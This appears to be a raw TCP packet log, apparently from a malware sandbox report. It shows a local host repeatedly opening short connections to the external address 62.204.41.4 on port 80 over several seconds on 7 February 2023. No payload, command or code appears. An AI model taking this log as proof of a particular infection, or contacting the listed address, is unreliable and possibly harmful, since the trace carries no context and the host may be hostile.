                          Feb 7, 2023 20:03:33.766799927 CET5029780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.827075958 CET805029662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.827542067 CET5029680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.829037905 CET805029762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.829189062 CET5029780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.829767942 CET5029780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:33.891994953 CET805029762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.894370079 CET805029762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:33.894625902 CET5029780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.002706051 CET5029780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.004245043 CET5029880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.065068007 CET805029762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.065301895 CET5029780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.066489935 CET805029862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.066679001 CET5029880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.067173958 CET5029880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.129400969 CET805029862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.133635044 CET805029862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.135576963 CET5029880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.253990889 CET5029880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.255064011 CET5029980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.315572977 CET805029962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.315836906 CET5029980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.316185951 CET805029862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.316301107 CET5029880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.321474075 CET5029980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.382097960 CET805029962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.386110067 CET805029962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.386348009 CET5029980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.500014067 CET5029980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.501456976 CET5030080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.561333895 CET805029962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.561470985 CET5029980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.563016891 CET805030062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.563188076 CET5030080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.563838005 CET5030080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.625458956 CET805030062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.627953053 CET805030062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.629528046 CET5030080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.736675024 CET5030080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.737585068 CET5030180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.798440933 CET805030062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.798641920 CET5030080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.800220013 CET805030162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.800406933 CET5030180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.801016092 CET5030180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.863517046 CET805030162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.866466045 CET805030162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:34.866660118 CET5030180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.985495090 CET5030180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:34.988080025 CET5030280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.048775911 CET805030162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.048971891 CET5030180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.049582958 CET805030262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.049700975 CET5030280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.050149918 CET5030280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.111824989 CET805030262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.117278099 CET805030262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.117516041 CET5030280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.244402885 CET5030280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.246504068 CET5030380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.305988073 CET805030262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.306071043 CET5030280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.307092905 CET805030362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.307348013 CET5030380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.307802916 CET5030380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.368504047 CET805030362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.371079922 CET805030362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.371227980 CET5030380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.483555079 CET5030380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.484525919 CET5030480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.544291019 CET805030362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.544531107 CET5030380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.544717073 CET805030462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.544868946 CET5030480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.546382904 CET5030480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.606667042 CET805030462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.610938072 CET805030462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.611175060 CET5030480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.719773054 CET5030480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.721656084 CET5030580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.780328035 CET805030462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.780425072 CET5030480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.783032894 CET805030562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.783241987 CET5030580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.785500050 CET5030580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.848788977 CET805030562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.849256039 CET805030562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:35.849332094 CET5030580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.953871965 CET5030580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:35.954730034 CET5030680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.015202045 CET805030662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.015347958 CET805030562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.015449047 CET5030680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.015496016 CET5030580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.017601967 CET5030680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.078494072 CET805030662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.084789991 CET805030662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.085005045 CET5030680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.204256058 CET5030680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.204986095 CET5030780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.264928102 CET805030662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.265115023 CET5030680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.266869068 CET805030762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.267051935 CET5030780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.268284082 CET5030780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.329674959 CET805030762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.332087040 CET805030762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.332228899 CET5030780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.460246086 CET5030780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.461229086 CET5030880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.521637917 CET805030762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.521820068 CET5030780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.522779942 CET805030862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.522949934 CET5030880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.533930063 CET5030880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.595741034 CET805030862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.598963976 CET805030862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.599096060 CET5030880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.708754063 CET5030880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.709487915 CET5030980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.770469904 CET805030862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.770664930 CET5030880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.770754099 CET805030962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.770889044 CET5030980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.772736073 CET5030980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.834300995 CET805030962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.837404966 CET805030962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:36.837762117 CET5030980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.965137959 CET5030980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:36.966288090 CET5031080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.026654005 CET805031062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.026701927 CET805030962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.026829004 CET5031080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.026886940 CET5030980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.027404070 CET5031080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.087645054 CET805031062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.092389107 CET805031062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.092641115 CET5031080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.218987942 CET5031080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.221586943 CET5031180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.279324055 CET805031062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.279567003 CET5031080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.281208038 CET805031162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.281435966 CET5031180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.282021999 CET5031180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.341661930 CET805031162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.346067905 CET805031162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.349085093 CET5031180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.454797029 CET5031180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.455971956 CET5031280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.514525890 CET805031162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.516114950 CET5031180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.516702890 CET805031262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.516907930 CET5031280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.521186113 CET5031280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.582039118 CET805031262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.584707975 CET805031262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.589246035 CET5031280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.703366041 CET5031280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.704510927 CET5031380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.764571905 CET805031262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.767522097 CET805031362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.767705917 CET5031280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.767760992 CET5031380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.774354935 CET5031380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.836786032 CET805031362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.840990067 CET805031362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:37.844500065 CET5031380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.953330994 CET5031380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:37.954487085 CET5031480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.016194105 CET805031362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.016227961 CET805031462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.016412020 CET5031380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.016499043 CET5031480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.017064095 CET5031480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.078589916 CET805031462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.083966017 CET805031462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.087981939 CET5031480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.202501059 CET5031480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.203288078 CET5031580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.265453100 CET805031462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.265603065 CET5031480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.265939951 CET805031562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.266060114 CET5031580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.266612053 CET5031580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.328536987 CET805031562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.330622911 CET805031562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.330754042 CET5031580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.438350916 CET5031580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.439475060 CET5031680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.499871969 CET805031562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.500049114 CET5031580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.501089096 CET805031662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.501193047 CET5031680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.501750946 CET5031680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.563205004 CET805031662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.566030025 CET805031662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.566164017 CET5031680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.676904917 CET5031680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.677943945 CET5031780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.739873886 CET805031662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.740067005 CET5031680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.740622044 CET805031762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.740768909 CET5031780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.748559952 CET5031780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.811719894 CET805031762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.814222097 CET805031762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.814404964 CET5031780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.922884941 CET5031780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.923744917 CET5031880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.984814882 CET805031862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.984920979 CET5031880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.985270977 CET805031762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:38.985318899 CET5031880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:38.985450029 CET5031780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.046904087 CET805031862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.050878048 CET805031862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.051045895 CET5031880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.156868935 CET5031880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.157618999 CET5031980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.217370987 CET805031862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.217509031 CET5031880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.217961073 CET805031962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.218096972 CET5031980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.222800016 CET5031980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.283920050 CET805031962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.286186934 CET805031962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.286319971 CET5031980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.407049894 CET5031980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.414825916 CET5032080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.467509985 CET805031962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.467592955 CET5031980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.477979898 CET805032062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.478173971 CET5032080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.480009079 CET5032080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.541378021 CET805032062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.544099092 CET805032062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.544213057 CET5032080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.660098076 CET5032080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.662453890 CET5032180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.721745014 CET805032062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.721915960 CET5032080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.723732948 CET805032162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.723922014 CET5032180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.741322994 CET5032180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.802756071 CET805032162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.805164099 CET805032162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.805278063 CET5032180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.924880981 CET5032180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.926002979 CET5032280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.986515999 CET805032162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.986598969 CET5032180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.987503052 CET805032262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:39.987668991 CET5032280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:39.988883018 CET5032280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.050406933 CET805032262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.054217100 CET805032262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.054461956 CET5032280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.171015978 CET5032280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.171766043 CET5032380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.232846975 CET805032262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.233081102 CET5032280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.234555960 CET805032362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.234721899 CET5032380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.235917091 CET5032380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.298307896 CET805032362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.301186085 CET805032362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.302093983 CET5032380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.405991077 CET5032380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.406646967 CET5032480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.467118979 CET805032462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.469094038 CET805032362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.469372988 CET5032380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.470011950 CET5032480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.470050097 CET5032480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.530333042 CET805032462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.533003092 CET805032462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.533198118 CET5032480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.646651030 CET5032480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.647650003 CET5032580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.707132101 CET805032462.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.708079100 CET805032562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.708185911 CET5032480192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.708298922 CET5032580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.711952925 CET5032580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.772733927 CET805032562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.775124073 CET805032562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.777241945 CET5032580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.891639948 CET5032580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.892923117 CET5032680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.952390909 CET805032562.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.952441931 CET805032662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:40.952549934 CET5032580192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.952667952 CET5032680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:40.953159094 CET5032680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.012614965 CET805032662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.014763117 CET805032662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.014957905 CET5032680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.125878096 CET5032680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.126835108 CET5032780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.185448885 CET805032662.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.185693026 CET5032680192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.187072992 CET805032762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.188333988 CET5032780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.188879967 CET5032780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.249324083 CET805032762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.252693892 CET805032762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.252871037 CET5032780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.388605118 CET5032780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.389703035 CET5032880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.449042082 CET805032762.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.449296951 CET5032780192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.452033997 CET805032862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.452197075 CET5032880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.453965902 CET5032880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.516316891 CET805032862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.523385048 CET805032862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.523586988 CET5032880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.640117884 CET5032880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.641138077 CET5032980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.701455116 CET805032962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.701831102 CET5032980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.703416109 CET805032862.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.703767061 CET5032880192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.705909014 CET5032980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.765394926 CET805032962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.767422915 CET805032962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.767512083 CET5032980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.875607967 CET5032980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.878433943 CET5033080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.934956074 CET805032962.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.935194969 CET5032980192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.937958002 CET805033062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:41.938203096 CET5033080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:41.942562103 CET5033080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.001923084 CET805033062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.005326986 CET805033062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.005605936 CET5033080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.110721111 CET5033080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.111876965 CET5033180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.170464039 CET805033062.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.170726061 CET5033080192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.172483921 CET805033162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.172714949 CET5033180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.173293114 CET5033180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.233850956 CET805033162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.237587929 CET805033162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.237809896 CET5033180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.361538887 CET5033180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.372240067 CET5033280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.422235966 CET805033162.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.422461033 CET5033180192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.433866978 CET805033262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.434158087 CET5033280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.434856892 CET5033280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.496309042 CET805033262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.499845028 CET805033262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.500089884 CET5033280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.610776901 CET5033280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.611932993 CET5033380192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.672564983 CET805033262.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.672769070 CET5033280192.168.2.662.204.41.4
                          Feb 7, 2023 20:03:42.673355103 CET805033362.204.41.4192.168.2.6
                          Feb 7, 2023 20:03:42.673495054 CET5033380192.168.2.662.204.41.4
